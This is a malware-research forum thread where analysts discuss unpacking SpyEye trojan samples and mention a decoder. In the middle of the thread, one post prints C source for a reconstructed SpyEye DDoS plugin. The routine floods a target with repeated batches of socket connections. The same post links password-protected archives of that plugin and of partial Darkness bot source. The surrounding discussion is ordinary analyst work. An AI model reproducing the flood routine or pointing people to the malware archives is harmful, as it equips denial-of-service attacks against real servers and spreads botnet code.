[USForce]

An surprise? Quite primitive.

Yeah, let me say that SpyEye is become pretty trivial to unpack and decode. I'd say it's almost boring :D

[cronos713]

Hi EP_X0FF, thank you very much. Yes, this is quite primitive, about six months ago.
USForce, you have something script for this?

[EP_X0FF]

It can't be so old (6 months). Maybe 1.5 or 2-3. What scripts? For this skiddie crypter bpx NtWriteVirtualMemory - decryption done.

[cronos713]

Thanks! Yes, may be more recent. I mean a script that automates the task of the genre .zip + the pass [md5]
The following shows what is new

[EP_X0FF]

It's the same. Just recrypted.

[cronos713]

Oh okey, thanks again!

[kmd]

someone fully reconstructed ddos plug of spyeye shi.. i mean kit xD

http://demonteam.narod.ru/download/P1.rar. PASS: 666

Code: Select all

void cmd_ssyn(LPSTR host, u_short port, DWORD second)
{
	WSADATA wsadata;
	SOCKADDR_IN sin;
	u_long mode = 1;
	SOCKET s;
	SOCKET ss[100];
	
	if(WSAStartup(MAKEWORD(2, 0/*!? 2*/), &wsadata))
	{
		DWORD inetaddr = resolve(host);
		sin.sin_family = AF_INET;
		sin.sin_port = htons(port);
		sin.sin_addr.s_addr = inetaddr;
		
		int st = GetTickCount(); // start time
		while(GetTickCount()-st <= second*1000) // тайм-аут
		{
			for(int i=0; i < 100; i++)
			{
				if(Stop) break;
				s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
				ss[i] = s;
				if(s != INVALID_SOCKET)
				{
					ioctlsocket(s, FIONBIO, &mode);
				}
			}
			for(int i=0; i < 100; i++)
			{
				connect(ss[i], (SOCKADDR*)&sin, sizeof(sin));
			}
			Sleep(100);
			for(int i=0; i < 100; i++)
			{
				closesocket(ss[i]);
			}
		}
	}
}

+ Darkness bot partial source

http://demonteam.narod.ru/download/P2.rar. PASS: 666

[pigindrin]

Hi, could anyone help me and post a "how to" to unpack and decode Spyeye samples?. It would be great to analyze them. I know that for USForce is trivial, but if you could give me a hand, I´ll appreciate.

[EP_X0FF]

Everything become trivial when you do this few thousand times. No manual for "unpacking" SpyEye since there are nothing to unpack except UPX or PECompact. They are using several different crypters in combination with packers which I highlighted before. So you need to know in general how to debug and reverse programs and malware. About your second question refer to page #10 where I posted decoder. Slightly modified it will work for all available bot versions including old v1.2

[pigindrin]

Thanks, I will check it. Just to know, what is the prog language of the code? Best Regards!